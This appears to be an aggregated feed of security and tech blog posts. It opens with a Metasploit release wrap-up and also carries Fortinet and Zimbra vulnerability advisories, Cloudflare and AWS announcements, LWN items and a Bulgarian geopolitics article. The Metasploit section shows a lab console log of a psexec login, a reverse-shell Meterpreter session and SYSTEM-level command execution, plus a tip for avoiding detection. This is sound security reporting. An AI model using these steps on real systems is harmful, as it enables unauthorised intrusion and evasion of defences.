Metasploit Weekly Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2022/10/07/metasploit-weekly-wrap-up-179/

Bofloader – Windows Meterpreter Gets Beacon Object File Loader Support

Metasploit Weekly Wrap-Up

This week brings a new and frequently requested feature to the Windows Meterpreter, the Beacon Object File loader. This new extension, bofloader, allows for users to execute Beacon Object Files as written for either Cobalt Strike or Sliver. This extension was provided by a group effort among community members kev169, GuhnooPlusLinux, R0wdyJoe, and skylerknecht.

Documentation is available on the new docs site which walks through using the new extension. Since the bofloader is a full-fledged extension, it can be used without loading stdapi which has been noted as an important setting (set AutoLoadStdapi false) for avoiding detection.

Once a Meterpreter session is loaded along with the bofloader extension, the execute_bof command becomes available. The user needs to specify a path to their BOF file and any necessary arguments.

msf6 exploit(windows/smb/psexec) > set AutoLoadStdapi false
AutoLoadStdapi => false
msf6 exploit(windows/smb/psexec) > exploit


[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:62900) at 2022-10-07 12:10:21 -0400


meterpreter > load bofloader
Loading extension bofloader...

meterpreter                  
   ▄▄▄▄    ▒█████    █████▒  
  ▓█████▄ ▒██▒  ██▒▓██   ▒   
  ▒██▒ ▄██▒██░  ██▒▒████ ░   
  ▒██░█▀  ▒██   ██░░▓█▒  ░   
  ░▓█  ▀█▓░ ████▓▒░░▒█░      
  ░▒▓███▀▒░ ▒░▒░▒░  ▒ ░      
  ▒░▒   ░   ░ ▒ ▒░  ░     ~ by @kev169, @GuhnooPluxLinux, @R0wdyJoe, @skylerknecht ~
   ░    ░ ░ ░ ░ ▒   ░ ░      
   ░          ░ ░  loader    
        ░                    


Success.
meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/whoami/whoami.x64.o
[*] No arguments specified, executing bof with no arguments.


UserName		SID
====================== ====================================
MSFLAB\DC$	S-1-5-18




GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
BUILTIN\Administrators                            Alias                    S-1-5-32-544                                  Enabled by default, Enabled group, Group owner, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\System Mandatory Level            Label                    S-1-16-16384                                  Mandatory group, Enabled by default, Enabled group, 




Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeAssignPrimaryTokenPrivilege Replace a process level token                     Disabled                      
...             


meterpreter > 

If MinGW is available, BOF files can be compiled from source code using the –compile flag.

meterpreter > execute_bof ../../OutputStreams.c --compile
[*] No arguments specified, executing bof with no arguments.
[CALLBACK_OUTPUT]: message
[CALLBACK_ERROR]:  message

meterpreter > 

Finally, BOF files which require arguments can be called if the user knows their format. This information would typically come from either reading the BOF file’s source code or documentation. In the following example, the nslookup BOF takes two UTF-8 strings, followed by one int16. The format string details can be found in the documentation along with a table for quick reference in the --help output.

meterpreter > execute_bof ../CS-Situational-Awareness-BOF/SA/nslookup/nslookup.x64.o --format-string zzs metasploit.com 192.168.250.4 1
A metasploit.com 18.67.65.57
A metasploit.com 18.67.65.86
A metasploit.com 18.67.65.104
A metasploit.com 18.67.65.65
NS com f.gtld-servers.net
NS com a.gtld-servers.net
...

meterpreter >

WordPress Elementor RCE – CVE-2022-1329

This week community contributors AkuCyberSec, Ramuel Gall, and h00die landed a nice module for CVE-2022-1329, an authenticated vulnerability in the Elementor Website Builder Plugin for WordPress that allows unauthorized execution of several AJAX actions.

Any authenticated user can exploit this vulnerability to upload a PHP file onto the website. The module takes advantage of this vulnerability to request that the Elementor plugin try to install Elementor Pro from a user supplied zip file, which is something any user wih Subscriber permissions or higher can do. Once the PHP file is uploaded to the target website, the attacker can then browse to the page hosting their PHP file to get RCE as the www-data user.

Ubuntu Enlightment Mount Priv Esc – CVE-2022-37706

Its been a while since we last had a Linux LPE in the framework for Ubuntu, but thanks to some work from community contributors Maher Azzouzi and h00die, we have an exploit for CVE-2022-37706. This takes advantage of a bug within one of Linux’s window managers, called Enlightment, and occurs due to a command injection vulnerability in Enlightment’s enlightment_sys binary. Versions prior to Enlightment 0.25.4 are vulnerable and can be exploited by authenticated users who have a userland shell to gain arbitrary code execution as the root user.

Remote Mouse Server RCE – Unpatched

Community contributors 0RPHON, H4rk3nz0, and h00die brought us a nice vulnerability this week for an unauthenticated RCE via the Emote Interactive protocol, aka CVE-2022-3365. The bug occurs since the authentication for the Emote Interactive protocol never seemed to be enforced according to 0RPHON, the original bug discoverer. Attackers can utilize this vulnerability to gain unauthenticated RCE as the user running Remote Mouse Server. Note that whilst a CVE is assigned, the bug is still unpatched at the time of writing.

New module content (6)

Enhancements and features (3)

Bugs fixed (3)

  • #17072 from smashery – This PR fixes a regression discovered when session interaction hangs because a file slated for cleanup is in use, so the framework side times out, but the shell side does not. The fix also includes more robust handling for shell tokens in all types of shells.
  • #17078 from cgranleese-r7 – This PR updates the deprecated report_auth_info method calls in the modules/auxiliary/scanner/rservices/ modules to now make use of create_credential instead.
  • #17091 from bcoles – Fixes module metadata for stability and reliability for several modules.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

On October 3, 2022, Fortinet released a software update that indicates then-current versions of their FortiOS (firewall) and FortiProxy (web proxy) software are vulnerable to CVE-2022-40684, a critical vulnerability that allows remote, unauthenticated attackers to bypass authentication and gain access to the administrative interface of these products with only a specially crafted http/s request.

According to communications from Fortinet that were shared on social media, Fortinet “is strongly recommending all customers with vulnerable versions to perform an immediate upgrade.”

Affected products

  • FortiOS 7.0.0 to 7.0.6
  • FortiOS 7.2.0 to 7.2.1
  • FortiProxy 7.0.0 to 7.0.6 and 7.2.0

Remediation

On Thursday, October 6, 2022, Fortinet released version 7.0.7 and version 7.2.2, which resolve the vulnerability.

Along with Fortinet, Rapid7 strongly recommends that organizations who are running an affected version of the software upgrade to 7.07 or 7.2.2 immediately, on an emergency basis. These products are edge devices, which are high-value and high-focus targets for attackers looking to gain internal network access. While Rapid7 is not currently aware of exploitation in the wild for this vulnerability, using prior FortiOS vulnerabilities as in indicator (such as CVE-2018-13379) we expect attackers to focus on CVE-2022-40684 quickly and for quite some time.

Furthermore, Rapid7 recommends that all high-value edge devices limit public access to any administrative interface.

Rapid7 customers

InsightVM/Nexpose customers: Our researchers are currently working on adding vulnerability check(s).

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

[$] The first half of the 6.1 merge window

Post Syndicated from original https://lwn.net/Articles/910312/

The 6.1 merge window is well underway: since it opened, 5,752 non-merge
changesets have been pulled into the mainline repository. That is
approximately half of the work that had piled up in linux-next and marks a
good time to look at what has been merged so far. Some long-awaited core
changes have landed for the next kernel release, but there is likely to be
more to come.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/910606/

Security updates have been issued by Debian (dbus, isc-dhcp, and strongswan), Fedora (booth, php, php-twig, php-twig2, and php-twig3), Oracle (expat, prometheus-jmx-exporter, and squid), Red Hat (expat, openvswitch2.11, and squid), Scientific Linux (expat and squid), SUSE (exiv2, LibVNCServer, postgresql-jdbc, protobuf, python-PyJWT, python3, slurm, squid, and webkit2gtk3), and Ubuntu (libreoffice).

Cloudflare Pages gets even faster with Early Hints

Post Syndicated from Greg Brimble original https://blog.cloudflare.com/early-hints-on-cloudflare-pages/

Cloudflare Pages gets even faster with Early Hints

Cloudflare Pages gets even faster with Early Hints

Last year, we demonstrated what we meant by “lightning fast”, showing Pages’ first-class performance in all parts of the world, and today, we’re thrilled to announce an integration that takes this commitment to speed even further – introducing Pages support for Early Hints! Early Hints allow you to unblock the loading of page critical resources, ahead of any slow-to-deliver HTML pages. Early Hints can be used to improve the loading experience for your visitors by significantly reducing key performance metrics such as the largest contentful paint (LCP).

What is Early Hints?

Early Hints is a new feature of the Internet which is supported in Chrome since version 103, and that Cloudflare made generally available for websites using our network. Early Hints supersedes Server Push as a mechanism to “hint” to a browser about critical resources on your page (e.g. fonts, CSS, and above-the-fold images). The browser can immediately start loading these resources before waiting for a full HTML response. This uses time that was otherwise previously wasted! Before Early Hints, no work could be started until the browser received the first byte of the response. Now, the browser can fill this time usefully when it was previously sat waiting. Early Hints can bring significant improvements to the performance of your website, particularly for metrics such as LCP.

How Early Hints works

Cloudflare caches any preload and preconnect type Link headers sent from your 200 OK response, and sends them early for any subsequent requests as a 103 Early Hints response.

In practical terms, an HTTP conversation now looks like this:

Request

GET /
Host: example.com

Early Hints Response

103 Early Hints
Link: </styles.css>; rel=preload; as=style

Response

200 OK
Content-Type: text/html; charset=utf-8
Link: </styles.css>; rel=preload; as=style

<html>
<!-- ... -->
</html>

Early Hints on Cloudflare Pages

Websites hosted on Cloudflare Pages can particularly benefit from Early Hints. If you’re using Pages Functions to generate dynamic server-side rendered (SSR) pages, there’s a good chance that Early Hints will make a significant improvement on your website.

Performance Testing

We created a simple demonstration e-commerce website in order to evaluate the performance of Early Hints.

Cloudflare Pages gets even faster with Early Hints

This landing page has the price of each item, as well as a remaining stock counter. The page itself is just hand-crafted HTML and CSS, but these pricing and inventory values are being templated in live for every request with Pages Functions. To simulate loading from an external data-source (possibly backed by KV, Durable Objects, D1, or even an external API like Shopify) we’ve added a fixed delay before this data resolves. We include preload links in our response to some critical resources:

  • an external CSS stylesheet,
  • the image of the t-shirt,
  • the image of the cap,
  • and the image of the keycap.

The very first request makes a waterfall like you might expect. The first request is held blocked for a considerable amount of time while we resolve this pricing and inventory data. Once loaded, the browser parses the HTML, pulls out the external resources, and makes subsequent requests for their contents. The CSS and images extend the loading time considerably given their large dimensions and high quality. The largest contentful paint (LCP) occurs when the t-shirt image loads, and the document finishes once all requests are fulfilled.

Cloudflare Pages gets even faster with Early Hints

Subsequent requests are where things get interesting! These preload links are cached on Cloudflare’s global network, and are sent ahead of the document in a 103 Early Hints response. Now, the waterfall looks much different. The initial request goes out the same, but now, requests for the CSS and images slide much further left since they can be started as soon as the 103 response is delivered. The browser starts fetching those resources while waiting for the original request to finish server-side rendering. The LCP again occurs once the t-shirt image has loaded, but this time, it’s brought forward by 530ms because it started loading 752ms faster, and the document is fully loaded 562ms faster, again because the external resources could all start loading faster.

Cloudflare Pages gets even faster with Early Hints

The final four requests (highlighted in yellow) come back as 304 Not Modified responses using a If-None-Match header. By default, Cloudflare Pages requires the browser to confirm that all assets are fresh, and so, on the off chance that they were updated between the Early Hints response and when they come to being used, the browser is checking if they have changed. Since they haven’t, there’s no contentful body to download, and the response completes quickly. This can be avoided by setting a custom Cache-Control header on these assets using a _headers file. For example, you could cache these images for one minute with a rule like:

# _headers

/*.png
  Cache-Control: max-age=60

We could take this performance audit further by exploring other features that Cloudflare offers, such as automatic CSS minification, Cloudflare Images, and Image Resizing.

We already serve Cloudflare Pages from one of the fastest networks in the world — Early Hints simply allows developers to take advantage of our global network even further.

Using Early Hints and Cloudflare Pages

The Early Hints feature on Cloudflare is currently restricted to caching Link headers in a webpage’s response. Typically, this would mean that Cloudflare Pages users would either need to use the _headers file, or Pages Functions to apply these headers. However, for your convenience, we’ve also added support to transform any <link> HTML elements you include in your body into Link headers. This allows you to directly control the Early Hints you send, straight from the same document where you reference these resources – no need to come out of HTML to take advantage of Early Hints.

For example, for the following HTML document, will generate an Early Hints response:

HTML Document

<!DOCTYPE html>
<html>
  <head>
    <link rel="preload" as="style" href="/styles.css" />
  </head>
  <body>
    <!-- ... -->
  </body>
</html>

Early Hints Response

103 Early Hints
Link: </styles.css>; rel=preload; as=style

As previously mentioned, Link headers can also be set with a _headers file if you prefer:

# _headers

/
  Link: </styles.css>; rel=preload; as=style

Early Hints (and the automatic HTML <link> parsing) has already been enabled automatically for all pages.dev domains. If you have any custom domains configured on your Pages project, make sure to enable Early Hints on that domain in the Cloudflare dashboard under the “Speed” tab. More information can be found in our documentation.

Additionally, in the future, we hope to support the Smart Early Hints features. Smart Early Hints will enable Cloudflare to automatically generate Early Hints, even when no Link header or <link> elements exist, by analyzing website traffic and inferring which resources are important for a given page. We’ll be sharing more about Smart Early Hints soon.

In the meantime, try out Early Hints on Pages today! Let us know how much of a loading improvement you see in our Discord server.

Spyware Maker Intellexa Sued by Journalist

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/10/spyware-maker-intellexa-sued-by-journalist.html

The Greek journalist Thanasis Koukakis was spied on by his own government, with a commercial spyware product called “Predator.” That product is sold by a company in North Macedonia called Cytrox, which is in turn owned by an Israeli company called Intellexa.

Koukakis is suing Intellexa.

The lawsuit filed by Koukakis takes aim at Intellexa and its executive, alleging a criminal breach of privacy and communication laws, reports Haaretz. The founder of Intellexa, a former Israeli intelligence commander named Taj Dilian, is listed as one of the defendants in the suit, as is another shareholder, Sara Hemo, and the firm itself. The objective of the suit, Koukakis says, is to spur an investigation to determine whether a criminal indictment should be brought against the defendants.

Why does it always seem to be Israel? The world would be a much safer place if that government stopped this cyberweapons arms trade from inside its borders.

Трусовете в Източното Средиземноморие чертаят криза и за Европейския съюз 

Post Syndicated from Мирослав Зафиров original https://toest.bg/israel-lebanon/

В началото на октомври медиите в Израел публикуваха информация, според която Ливан и Израел най-сетне са на крачка от финала на преговорите, които трябва да очертаят линията на морската им граница, като са си разменили дългоочакваните насрещни проекти за споразумение. В специално обръщение към нацията от 1 октомври т.г. лидерът на „Хизбулла“ шейх Хасан Насралла посочи, че преговорите за морската граница на Ливан се намират във фаза, която отговаря на интересите на страната. На речта бе обърнато специално внимание в Израел.

Въпросът за демаркацията на морската граница е изключително важен за съдбата на Източното Средиземноморие

като място, към което ЕС гледа с надежда да задоволи глада за енергийни ресурси. За да докаже значимостта на въпроса за израелско-ливанския териториален спор за всички държави от региона и за самия ЕС, още в първите дни на септември генералният директор на гръцката енергийна компания Energean Матиос Ригас заяви пред медиите, че няма основания да се смята, че началото на експлоатацията на находището „Кариш“ ще бъде забавено, като посочи и датата – 20 септември.

Местонахождението на „Кариш“ има особено значение за преговорите с Ливан, тъй като то бе в основата на няколко предупреждения от „Хизбулла“ към Израел. През последните години ливанското движение, което претендира за водещо място в политическия живот на страната, претендира и за ролята на защитник на националните интереси, въпреки че по същество не участва в преговорите между Израел и Ливан с посредничеството на САЩ.

На 2 юли т.г., въпреки позицията на ливанското правителство в полза на преговори с Израел, „Хизбулла“ организира демонстрация на военните си възможности, като пусна в изпитателен полет дронове именно над „Кариш“. Потенциалната атака бе предотвратена от израелските ВВС и ВМС, но тази демонстрация на присъствие от страна на ливанската групировка послужи като повод Израел от своя страна да предупреди, че

всеки опит за провокация по южната граница на страната ще бъде посрещнат с безмилостен отговор.

Предупреждението бе сведено до знанието на „Хизбулла“ посредством военни и дипломатически канали.

Паралелно с размяната на предупреждения продължиха опитите на американския посредник Амос Хохщайн да постигне успех в преговорите за споразумение. Американският представител посети отново Ливан и Израел, като в Бейрут е предоставил на вниманието на ливанското правителство принципите на израелското предложение. Основните точки в него се концентрират върху желанието на Израел „Кариш“ и зоната за сигурност около находището да останат в очертанията на Израел, докато Ливан получава офшорното поле „Кана“, към което интерес има компанията Total.

Именно поради големия интерес от страна на френския гигант, от август насам се говори и за участието на Франция в преговорите между страните. Известно е, че САЩ и Израел също са в контакт с Париж с цел Total да започне работа в „Кана“ в обозримо бъдеще, което ще бъде допълнителен мотив за Ливан да се съгласи на сделка.

Ако Израел успее да се договори с Бейрут, подобно споразумение би имало силата на своеобразен „мирен договор“

и би било дори по-ценно от т.нар. Abraham Accords, тъй като на практика ще гарантира сигурността по северната му граница с противник, който традиционно представлява стратегическа заплаха за израелската държава. Според медийни публикации в замяна на контрола над „Кана“ Израел настоява Ливан да предаде изцяло правото на контрол над пограничната зона Рош Ханикра на Средиземно море.

В тактически опит да създаде напрежение и дори да повлияе на преговорите в заключителния им етап „Хизбулла“ обвини Амос Хохщайн в преднамереност и симпатии към Израел. Кампания в близките до движението медии настоява „Ливан да бъде допуснат до природните си богатства“.

Важен мотив в израелския стратегически анализ на това доколко Ливан е наистина склонен да сключи споразумение, е тежката финансова и икономическа криза в страната. Държавата е на ръба на банкрута, за пореден път ливанската Централна банка спря тегленето на средства за частни клиенти, което доведе до масови протести. С настъпването на зимата и в условията на усложнена продоволствена криза заради войната в Украйна

Ливан отново е на прага на огромно социално напрежение.

Не на последно място, държавата продължава да изпитва негативите от войната в Сирия, а самата „Хизбулла“ далеч не се намира в най-изгодното положение по отношение на подкрепата сред населението. Мнозина обвиняват движението за тежката институционална криза, чието олицетворение бе опустошителният взрив на пристанището в Бейрут през 2020 г.

В полза на окончателното споразумение се изказа и министърът на външните работи на Ливан Абдалла Бухабиб, който напомни, че преди изборите в Израел би могло да се постигне споразумение. Никой не може да каже какво ще се случи след ноември, напомня Бухабиб, като добавя, че „съществува мнение, че ако Бенямин Нетаняху успее да победи на изборите, споразумението с Ливан ще пропадне“. Според него преговорите в момента са „95% приключени“.

Както обикновено, Израел не разчита изцяло на ефекта от дипломатическите усилия

и воден от принципа Si vis pacem, para bellum (Ако искаш мир, готви се за война), внимателно следи за действията на „Хизбулла“ в Ливан. От началото на 2022 г. израелското военно командване и служби за сигурност предупреждават за наблюдавани маневри от страна на „Хизбулла“ по израелската граница не само откъм Ливан, но и на територията на Сирия. Придвижването на бойни съединения и укрепването на позиции са съчетани с операции и дори с изпращане на дронове към Израел.

Паралелно с тези действия, отношенията на „Хизбулла“ с палестинските радикални фракции (основно с „Хамас“) значително се подобриха. Палестинското движение в момента се намира в доста по-комфортна среда на територията на палестинските лагери, разположени в Ливан и особено в южната му част. Според израелски сведения организацията укрепва и военния си потенциал, а изстреляните по Израел през лятото ракети са всъщност от арсенала на „Хамас“. Самото движение не отрича тази тенденция на усилване на военния капацитет.

Според оценките на израелската армия „военен сблъсък с „Хизбулла“ не е изключен“,

тъй като организацията, изправена пред предизвикателствата за своята легитимност в Ливан, би могла да потърси изход в конфликт с „обичайния враг Израел“. Според доклад на израелската армия, части от който получиха гласност, „Хизбулла“ в момента страда от широко разпространения имидж на деструктивен политически играч, който заради своите тесни интереси е поставил на карта самото съществуване на Ливан. Лидерът на „Хизбулла“ шейх Хасан Насралла се намира в трудна позиция след загубата на своя отявлен съюзник генерал Касим Сюлеймани, което се отразява и на неговите контакти с Иран и Сирия. Заради това и заради загубите на воденото от него движение Насралла би могъл да търси изход във военен конфликт, тъй като малцина са онези в Ливан, които биха повярвали, че именно „Хизбулла“ има заслуга за евентуален успех в преговорите между Израел и Ливан.

Нов конфликт с Ливан, който все пак – по мнението на мнозина в Израел, но и в Бейрут – е малко вероятен, особено на фона на всеобщата дестабилизация след началото на войната в Украйна, ще постави под съмнение и инфраструктурната диверсификация на енергийните потоци в Източното Средиземноморие. Строежът на газопровод от Израел към Турция през акваторията на Ливан и Сирия ще бъде отложен. Това е аргумент, който действа доста силно върху всички замесени в преговорите в момента и следва да послужи като възпиращ фактор за евентуални необмислени провокации.

Състоянието на израелския енергиен сектор в момента

Към момента Израел отбелязва увеличение на лицензионните плащания по износ на газ с 50%. Това се дължи на високите енергийни ресурси, които особено се увеличиха след началото на войната в Украйна. Добивът на газ също се увеличава с почти 20% за сметка на експлоатацията на полетата „Тамар“ и „Левиатан“.

Особено важно за страната е споразумението с ЕС и Египет от юни т.г., което недвусмислено показа, че Съюзът е готов да задълбочи стратегическите си взаимоотношения с Израел и разглежда държавата и като потенциален източник на природен газ. Израел използва тази обстановка, за да укрепи позициите си по основни въпроси – като този за отношенията си с Палестина. Посещението на председателката на ЕК Урсула фон дер Лайен в Тел Авив даде основание на посланика на Израел в ЕС да заключи, че между страните се откриват нови и по-широки перспективи.

По време на току-що завършилия в Брюксел Съвет за асоцииране ЕС–Израел премиерът Лапид изтъкна множеството перспективи за сътрудничество със Съюза, като специално акцентира върху енергийната сфера. Голяма част от държавите членки на ЕС също насочиха вниманието си в тази посока. Темата за мира между израелците и палестинците не беше на фокус, за разлика от тази за войната в Украйна и последиците от нея.

Израелският ресурс за износ на газ за ЕС в момента не надхвърля 10 млрд. куб.м. По силата на сделка между израелската компания Delek, американската Noble Energy и египетската Dolphinus Holdings, до края на 2022 г. по т.нар. Арабски газопровод през Египет ще потекат близо 4,7 млрд. куб.м газ.

Възможните към момента начини за износ на газ към ЕС включват и газопровод по дъното на Средиземно море до Турция, но този проект зависи от договорите с Ливан и положението в Сирия, което само по себе си няма изгледи за политическо решение след 11 години война. Алтернативата на всичко това беше т.нар. проект EastMed, който обединяваше усилията на Израел, Гърция, Кипър и Египет, но изгледите за неговото изпълнение са минимални. Опитът на страните да ограничат участието на Турция в този проект се провалиха, след като през януари т.г. САЩ се оттегли от участие поради „екологични и икономически причини“.

Заглавна илюстрация: Vladimir Gnedin / iStock

Източник

Spring 2022 SOC reports now available in Spanish

Post Syndicated from Rodrigo Fiuza original https://aws.amazon.com/blogs/security/spring-2022-soc-reports-now-available-in-spanish/

English

We continue to listen to our customers, regulators, and stakeholders to understand their needs regarding audit, assurance, certification, and attestation programs at Amazon Web Services (AWS). We are pleased to announce that Spring 2022 SOC 1, SOC 2, and SOC 3 reports are now available in Spanish. These translated reports will help drive greater engagement and alignment with customer and regulatory requirements across Latin America and Spain.

The English language version of the reports contains the independent opinion issued by the auditors and control test results. Stakeholders should use the English version as a complement to the Spanish version.

Translated SOC reports in Spanish are available through AWS Artifact. Translated SOC reports in Spanish will be published twice a year, in alignment with the Fall and Spring reporting cycles.

We value your feedback and questions—feel free to reach out to our team or give feedback about this post through the Contact Us page.

If you have feedback about this post, submit comments in the Comments section below.
Want more AWS Security news? Follow us on Twitter.


Español

Los informes SOC de Primavera de 2022 ahora están disponibles en español

Seguimos escuchando a nuestros clientes, reguladores y partes interesadas para comprender sus necesidades en relación con los programas de auditoría, garantía, certificación y atestación en Amazon Web Services (AWS). Nos complace anunciar que los informes SOC 1, SOC 2 y SOC 3 de AWS de otoño de 2021 ya están disponibles en español. Estos informes traducidos ayudarán a impulsar un mayor compromiso y alineación con los requisitos regulatorios y de los clientes en las regiones de América Latina y España.

La versión en inglés de los informes debe tenerse en cuenta en relación con la opinión independiente emitida por los auditores y los resultados de las pruebas de control, como complemento de las versiones en español.

Los informes SOC traducidos en español están disponibles en AWS Artifact. Los informes SOC traducidos en español se publicarán dos veces al año según los ciclos de informes de otoño y primavera.

Valoramos sus comentarios y preguntas; no dude en ponerse en contacto con nuestro equipo o enviarnos sus comentarios sobre esta publicación a través de nuestra página Contáctenos.

Si tienes comentarios sobre esta publicación, envíalos en la sección Comentarios a continuación.
¿Desea obtener más noticias sobre seguridad de AWS? Síguenos en Twitter.

Author

Rodrigo Fiuza

Rodrigo is a Security Audit Manager at AWS, based in São Paulo. He leads audits, attestations, certifications, and assessments across Latin America, Caribbean and Europe. Rodrigo has previously worked in risk management, security assurance, and technology audits for the past 12 years.

Andrew Najjar

Andrew Najjar

Andrew is a Compliance Program Manager at Amazon Web Services. He leads multiple security and privacy initiatives within AWS and has 8 years of experience in security assurance. Andrew holds a master’s degree in information systems and bachelor’s degree in accounting from Indiana University. He is a CPA and AWS Certified Cloud Practitioner.

Nathan Samuel

Nathan Samuel

Nathan is a Compliance Program Manager at Amazon Web Services. He leads multiple security and privacy initiatives within AWS. Nathan has a Bachelors of Commerce degree from the University of the Witwatersrand, South Africa and has 17 years’ experience in security assurance and holds the CISA, CRISC, CGEIT, CISM, CDPSE and Certified Internal Auditor certifications.

Ryan Wilks

Ryan Wilks

Ryan is a Compliance Program Manager at Amazon Web Services. He leads multiple security and privacy initiatives within AWS. Ryan has 11 years of experience in information security and holds ITIL, CISM and CISA certifications.

Total TLS: one-click TLS for every hostname you have

Post Syndicated from Dina Kozlov original https://blog.cloudflare.com/total-tls-one-click-tls-for-every-hostname/

Total TLS: one-click TLS for every hostname you have

Total TLS: one-click TLS for every hostname you have

Today, we’re excited to announce Total TLS — a one-click feature that will issue individual TLS certificates for every subdomain in our customer’s domains.

By default, all Cloudflare customers get a free, TLS certificate that covers the apex and wildcard (example.com, *.example.com) of their domain. Now, with Total TLS, customers can get additional coverage for all of their subdomains with just one-click! Once enabled, customers will no longer have to worry about insecure connection errors to subdomains not covered by their default TLS certificate because Total TLS will keep all the traffic bound to the subdomains encrypted.

A primer on Cloudflare’s TLS certificate offerings

Universal SSL — the “easy” option

In 2014, we announced Universal SSL — a free TLS certificate for every Cloudflare customer. Universal SSL was built to be a simple “one-size-fits-all” solution. For customers that use Cloudflare as their authoritative DNS provider, this certificate covers the apex and a wildcard e.g. example.com and *.example.com. While a Universal SSL certificate provides sufficient coverage for most, some customers have deeper subdomains like a.b.example.com for which they’d like TLS coverage. For those customers, we built Advanced Certificate Manager — a customizable platform for certificate issuance that allows customers to issue certificates with the hostnames of their choice.

Advanced certificates — the “customizable” option

For customers that want flexibility and choice, we build Advanced certificates which are available as a part of Advanced Certificate Manager. With Advanced certificates, customers can specify the exact hostnames that will be included on the certificate.

That means that if my Universal SSL certificate is insufficient, I can use the Advanced certificates UI or API to request a certificate that covers “a.b.example.com” and “a.b.c.example.com”. Today, we allow customers to place up to 50 hostnames on an Advanced certificate. The only caveat — customers have to tell us which hostnames to protect.

This may seem trivial, but some of our customers have thousands of subdomains that they want to keep protected. We have customers with subdomains that range from a.b.example.com to a.b.c.d.e.f.example.com and for those to be covered, customers have to use the Advanced certificates API to tell us the hostname that they’d like us to protect. A process like this is error-prone, not easy to scale, and has been rejected as a solution by some of our largest customers.

Instead, customers want Cloudflare to issue the certificates for them. If Cloudflare is the DNS provider then Cloudflare should know what subdomains need protection. Ideally, Cloudflare would issue a TLS certificate for every subdomain that’s proxying its traffic through the Cloudflare Network… and that’s where Total TLS comes in.

Enter Total TLS: easy, customizable, and scalable

Total TLS is a one-click button that signals Cloudflare to automatically issue TLS certificates for every proxied DNS record in your domain. Once enabled, Cloudflare will issue individual certificates for every proxied hostname. This way, you can add as many DNS records and subdomains as you need to, without worrying about whether they’ll be covered by a TLS certificate.

If you have a DNS record for a.b.example.com, we’ll issue a TLS certificate with the hostname a.b.example.com. If you have a wildcard record for *.a.b.example.com then we’ll issue a TLS certificate for “*.a.b.example.com”. Here’s an example of what this will look like in the Edge Certificates table of the dashboard:

Total TLS: one-click TLS for every hostname you have

Available now

Total TLS is now available to use as a part of Advanced Certificate Manager for domains that use Cloudflare as an Authoritative DNS provider. One of the superpowers of having Cloudflare as your DNS provider is that we’ll always add the proper Domain Control Validation (DCV) records on your behalf to ensure successful certificate issuance and renewal.

Enabling Total TLS is easy — you can do it through the Cloudflare dashboard or via API. In the SSL/TLS tab of the Cloudflare dashboard, navigate to Total TLS. There, choose the issuing CA — Let’s Encrypt, Google Trust Services, or No Preference, if you’d like Cloudflare to select the CA on your behalf then click on the toggle to enable the feature.

Total TLS: one-click TLS for every hostname you have

But that’s not all…

One pain point that we wanted to address for all customers was visibility. From looking at support tickets and talking to customers, one of the things that we realized was that customers don’t always know whether their domain is covered by a TLS certificate —  a simple oversight that can result in downtime or errors.

To prevent this from happening, we are now going to warn every customer if we see that the proxied DNS record that they’re creating, viewing, or editing doesn’t have a TLS certificate covering it. This way, our customers can get a TLS certificate issued before the hostname becomes publicly available, preventing visitors from encountering this error:

Total TLS: one-click TLS for every hostname you have

Join the mission

At Cloudflare, we love building products that help secure all Internet properties. Interested in achieving this mission with us? Join the team!

[$] Fingerprinting systems with TCP source-port selection

Post Syndicated from original https://lwn.net/Articles/910435/

Back in May 2022, a mysterious set of patches titled insufficient TCP
source port randomness
crossed the mailing lists and was subsequently
merged (at -rc6) into the 5.18 kernel. Little information was available at
the time about why significant changes to the networking stack needed to be
made so late in the development cycle. That situation has
finally changed with the publication of this paper by Moshe Kol,
Amit Klein, and Yossi Gilad. It seems that the way the kernel chose port
numbers for outgoing network connections made it possible to uniquely
fingerprint users.

Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)

Post Syndicated from Ron Bowes original https://blog.rapid7.com/2022/10/06/exploitation-of-unpatched-zero-day-remote-code-execution-vulnerability-in-zimbra-collaboration-suite-cve-2022-41352/

Exploitation of Unpatched Zero-Day Remote Code Execution Vulnerability in Zimbra Collaboration Suite (CVE-2022-41352)

CVE-2022-41352 is an unpatched remote code execution vulnerability in Zimbra Collaboration Suite discovered in the wild due to active exploitation. The vulnerability is due to the method (cpio) in which Zimbra’s antivirus engine (Amavis) scans inbound emails. Zimbra has provided a workaround, which is to install the pax utility and restart the Zimbra services. Note that pax is installed by default on Ubuntu, so Ubuntu-based Zimbra installations are not vulnerable by default.

